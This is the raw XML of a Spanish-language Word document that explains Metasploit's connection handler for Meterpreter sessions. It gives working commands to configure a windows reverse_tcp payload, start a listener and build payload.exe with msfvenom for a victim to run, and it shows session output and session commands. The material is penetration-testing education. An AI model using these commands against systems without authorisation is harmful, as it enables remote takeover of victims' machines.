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0E" w:rsidRPr="0051580E" w:rsidRDefault="0051580E" w:rsidP="0051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El "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Connection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" en el contexto de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refiere al mecanismo que gestiona y maneja las conexiones de sesiones, como las de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Meterpreter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, que se establecen entre la máquina atacante y la máquina objetivo. Esto es crucial para mantener, interactuar y administrar estas sesiones una vez que se ha explotado con éxito una vulnerabilidad.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051580E" w:rsidRPr="0051580E" w:rsidRDefault="0051580E" w:rsidP="0051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Uso del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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Connection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="0051580E" w:rsidRPr="0051580E" w:rsidRDefault="0051580E" w:rsidP="0051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Connection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utiliza principalmente para:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051580E" w:rsidRPr="0051580E" w:rsidRDefault="0051580E" w:rsidP="00515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Establecer Sesiones</w:t>
      </w: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vez que se ejecuta una carga útil (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payload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el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Connection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encarga de recibir la conexión entrante de la sesión.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051580E" w:rsidRPr="0051580E" w:rsidRDefault="0051580E" w:rsidP="00515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Mantener Sesiones</w:t>
      </w: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 Maneja la administración de múltiples sesiones activas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051580E" w:rsidRPr="0051580E" w:rsidRDefault="0051580E" w:rsidP="00515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Interacción con Sesiones</w:t>
      </w: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 Permite al usuario interactuar con las sesiones activas para ejecutar comandos, cargar módulos, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051580E" w:rsidRPr="0051580E" w:rsidRDefault="0051580E" w:rsidP="0051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Configuración del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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Connection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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Handler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="0051580E" w:rsidRPr="0051580E" w:rsidRDefault="0051580E" w:rsidP="005158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Configuración Básica</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051580E" w:rsidRPr="0051580E" w:rsidRDefault="0051580E" w:rsidP="0051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Al configurar un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debes especificar ciertas opciones que permitirán al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Connection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recibir la sesión. Por ejemplo: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use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</w:t>
      </w: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) &gt; set PAYLOAD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windows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reverse_tcp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</w:t>
      </w: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) &gt; set LHOST 192.168.1.100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</w:t>
      </w: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) &gt; set LPORT 4444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</w:t>
      </w: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) &gt;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</w:p>
    <w:p w:rsidR="0051580E" w:rsidRPr="0051580E" w:rsidRDefault="0051580E" w:rsidP="0051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En este caso:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051580E" w:rsidRPr="0051580E" w:rsidRDefault="0051580E" w:rsidP="00515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LHOST</w:t>
      </w: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la dirección IP de la máquina atacante donde el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Connection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estará escuchando.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051580E" w:rsidRPr="0051580E" w:rsidRDefault="0051580E" w:rsidP="00515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LPORT</w:t>
      </w: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el puerto en el cual el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Connection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estará escuchando.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051580E" w:rsidRPr="0051580E" w:rsidRDefault="0051580E" w:rsidP="005158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Ejemplo de Uso del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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Connection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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Handler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="0051580E" w:rsidRPr="0051580E" w:rsidRDefault="0051580E" w:rsidP="00515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Configurar el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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Payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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y el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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use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</w:t>
      </w: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) &gt; set PAYLOAD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windows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reverse_tcp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</w:t>
      </w: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) &gt; set LHOST 192.168.1.100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</w:t>
      </w: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) &gt; set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051580E" w:rsidRPr="0051580E" w:rsidRDefault="0051580E" w:rsidP="00515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Iniciar el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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</w:t>
      </w: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) &gt;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</w:p>
    <w:p w:rsidR="0051580E" w:rsidRPr="0051580E" w:rsidRDefault="0051580E" w:rsidP="005158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comenzará a escuchar en </w:t>
      </w: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192.168.1.100:4444</w:t>
      </w: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esperando una conexión entrante.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051580E" w:rsidRPr="0051580E" w:rsidRDefault="0051580E" w:rsidP="00515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Generar y Enviar el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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Payload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51580E" w:rsidRPr="0051580E" w:rsidRDefault="0051580E" w:rsidP="005158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Usando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msfvenom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puedes generar el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payload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entregarlo a la víctima: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msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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-p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windows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reverse_tcp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LHOST=192.168.1.100 LPORT=4444 -f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exe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payload.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051580E" w:rsidRPr="0051580E" w:rsidRDefault="0051580E" w:rsidP="005158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Una vez que la víctima ejecuta </w:t>
      </w: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payload.exe</w:t>
      </w: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el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Connection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recibirá la conexión y establecerá una sesión.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051580E" w:rsidRPr="0051580E" w:rsidRDefault="0051580E" w:rsidP="00515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Interacción con la Sesión</w:t>
      </w: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51580E" w:rsidRPr="0051580E" w:rsidRDefault="0051580E" w:rsidP="005158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Cuando la víctima ejecuta el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payload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deberías ver algo como esto en la consola de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[*]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Started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reverse TCP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on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192.168.1.100:4444 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[*]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Sending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stage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(179267 bytes)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to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192.168.1.105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[*]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session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1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opened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(192.168.1.100:4444 -&gt; 192.168.1.105:12345) at 2024-07-10 12:34:56 +0000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051580E" w:rsidRPr="0051580E" w:rsidRDefault="0051580E" w:rsidP="005158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Ahora puedes interactuar con la sesión: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</w:t>
      </w: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) &gt;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sessions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-i 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051580E" w:rsidRPr="0051580E" w:rsidRDefault="0051580E" w:rsidP="005158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Y luego ejecutar comandos en la sesión de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Meterpreter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sysinfo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Computer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: VICTIM-PC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OS              : Windows 10 (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Build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18362).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Architecture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: x64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System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Language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:</w:t>
      </w:r>
      <w:proofErr w:type="gram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en_US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: x86/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windows</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="0051580E" w:rsidRPr="0051580E" w:rsidRDefault="0051580E" w:rsidP="0051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Administrar Múltiples Sesiones</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051580E" w:rsidRPr="0051580E" w:rsidRDefault="0051580E" w:rsidP="0051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Si tienes múltiples sesiones abiertas, puedes listarlas y administrarlas con los siguientes comandos:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051580E" w:rsidRPr="0051580E" w:rsidRDefault="0051580E" w:rsidP="00515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Listar Sesiones Activas</w:t>
      </w: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sessions</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="0051580E" w:rsidRPr="0051580E" w:rsidRDefault="0051580E" w:rsidP="00515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Interactuar con una Sesión Específica</w:t>
      </w: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sessions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-i &lt;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session_id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51580E" w:rsidRPr="0051580E" w:rsidRDefault="0051580E" w:rsidP="005158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Cerrar una Sesión</w:t>
      </w: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51580E" w:rsidRPr="0051580E" w:rsidRDefault="0051580E" w:rsidP="0051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msf6 &gt;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sessions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-k &lt;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session_id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51580E" w:rsidRPr="0051580E" w:rsidRDefault="0051580E" w:rsidP="0051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15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Resumen</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051580E" w:rsidRPr="0051580E" w:rsidRDefault="0051580E" w:rsidP="0051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Connection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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1580E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>Handler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fundamental para gestionar las sesiones que se establecen después de ejecutar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payloads</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0051580E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>. Con las configuraciones adecuadas, puedes establecer, mantener e interactuar con múltiples sesiones, lo cual es esencial para llevar a cabo pruebas de penetración efectivas y detalladas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB2342" w:rsidRDefault="0051580E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E3966"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8BB8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2E2244"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6350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447970"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="187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B2B7E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="606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94"/>
    <w:rsid w:val="00075EE0"/>
    <w:rsid w:val="0051580E"/>
    <w:rsid w:val="00BD0C94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15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5158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580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51580E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1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51580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580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5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580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builtin">
    <w:name w:val="hljs-built_in"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00515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15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5158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580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51580E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1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51580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580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5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580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builtin">
    <w:name w:val="hljs-built_in"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00515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552</Words>
  <Characters>3038</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>25</Lines>
  <Paragraphs>7</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>Luffi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2024-07-12T00:53:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-12T00:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>